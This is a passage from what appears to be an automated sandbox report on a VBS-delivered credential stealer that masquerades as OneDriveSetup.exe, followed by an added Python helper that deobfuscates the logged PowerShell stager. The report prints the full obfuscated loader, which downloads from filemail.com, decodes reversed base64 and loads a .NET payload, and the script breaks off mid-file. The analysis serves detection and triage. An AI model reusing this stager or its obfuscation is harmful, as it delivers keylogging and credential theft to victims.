Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7928, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8064, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@8/6@7/7
Source: C:\Windows\SysWOW64\OneDriveSetup.exe Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\OneDriveSetup.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvunym5x.lfk.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008FCC000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008F99000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008FA7000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.2087394606.0000000009C7D000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008FD8000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008F89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\OneDriveSetup.exe "C:\Windows\SysWOW64\OneDriveSetup.exe"
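The second-stage command line in the process tree above is the whole loader: single-quoted fragments are concatenated, the placeholder tokens zNq, EIH and OTF are swapped back to the quote, $ and | characters by the trailing -replace chain, and the result is handed to "ieX" (Invoke-Expression spelled by indexing into $VerbosePreference). The reconstructed script downloads a file from filemail.com, cuts the text between <<BASE64_START>> and <<BASE64_END>>, reverses it, base64-decodes it, loads the bytes as a .NET assembly and calls dnlib.IO.Home.VAI with a reversed URL and a list of mostly "desativado" (Portuguese for "disabled") switches, one of which names OneDriveSetup as the process to host the payload. The Python below is an added triage helper, not part of the sandbox output or the malware: it undoes those transforms statically and never executes anything. It embeds the stage-2 command line from the report verbatim; the first stage ($Codigo) is plain base64 that the report elides, so it is not reproduced. Assumptions: the sandbox ran with the default $VerbosePreference value, and FAKE_DOWNLOAD is a constructed stand-in for the real hosted file, whose content is not in the report.

```python
"""Static deobfuscation of the PowerShell stager logged in this report.

Added example, not part of the sandbox output: it never executes the script,
it only undoes the string tricks (literal concatenation, placeholder -replace
chain, character-reversed strings, marker-delimited base64) so the loader's
URL, markers and arguments can be read and blocked.
"""
import base64
import re

# Stage-2 "-command" argument exactly as logged in the process tree above.
STAGE2 = r""". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"""

# Default values of the automatic variables the obfuscator indexes into
# (assumption: the sandbox ran with PowerShell defaults).
AUTOMATIC_DEFAULTS = {"verbosepreference": "SilentlyContinue"}

# Constructed stand-in for the file fetched from filemail.com (the real content is
# not in the report): an MZ stub between the loader's markers, base64-encoded and
# then character-reversed, which is the layout the stager expects.
FAKE_DOWNLOAD = ("<html>noise<<BASE64_START>>"
                 + base64.b64encode(b"MZ\x90\x00stub-not-a-real-pe")[::-1].decode()
                 + "<<BASE64_END>>noise</html>")


def ps_value(token):
    """Evaluate a literal from the -replace chain: 'text' or [char]N(+[char]M...)."""
    token = token.strip().strip("()").strip()
    if token.startswith("'"):
        return token.strip("'")
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", token, re.I))


def resolve_invoker(cmd):
    """Spell out ([string]$Var)[i,j]+'X'-Join'' by indexing into the variable's default."""
    m = re.search(r"\(\[string\]\$(\w+)\)\[([\d,]+)\]\+'(\w+)'-join''", cmd, re.I)
    base = AUTOMATIC_DEFAULTS[m.group(1).lower()]
    return "".join(base[int(i)] for i in m.group(2).split(",")) + m.group(3)


def deobfuscate(cmd):
    """Join the quoted fragments, then apply the trailing -replace chain in order."""
    concat = re.search(r"\(\s*\(\((?P<body>'.*?')\)\s*-c?replace", cmd, re.I | re.S).group("body")
    script = "".join(re.findall(r"'([^']*)'", concat))
    literal = r"'[^']*'|\([^)]*\)|\[char\]\d+"
    chain = re.findall(r"-(c?replace)\s*(%s)\s*,\s*(%s)" % (literal, literal), cmd, re.I)
    for op, frm, to in chain:
        frm, to = ps_value(frm), ps_value(to)
        if op.lower() == "creplace":   # -creplace: case-sensitive, literal
            script = script.replace(frm, to)
        else:                          # -replace: case-insensitive regex
            script = re.sub(re.escape(frm), lambda _m: to, script, flags=re.I)
    return script


def invoke_args(script):
    """Arguments handed to the reflectively loaded method; reversed URLs are flipped back."""
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script, re.S)
    args = re.findall(r"'([^']*)'", m.group(1))
    return [a[::-1] if a.endswith(("//:ptth", "//:sptth")) else a for a in args]


def carve_payload(text, start="<<BASE64_START>>", end="<<BASE64_END>>"):
    """Replicate the stager's carving (marker-delimited, reversed base64) without loading the result."""
    s = text.find(start)
    if s < 0:
        return None
    e = text.find(end, s + len(start))
    if e < 0:
        return None
    return base64.b64decode(text[s + len(start):e][::-1])


if __name__ == "__main__":
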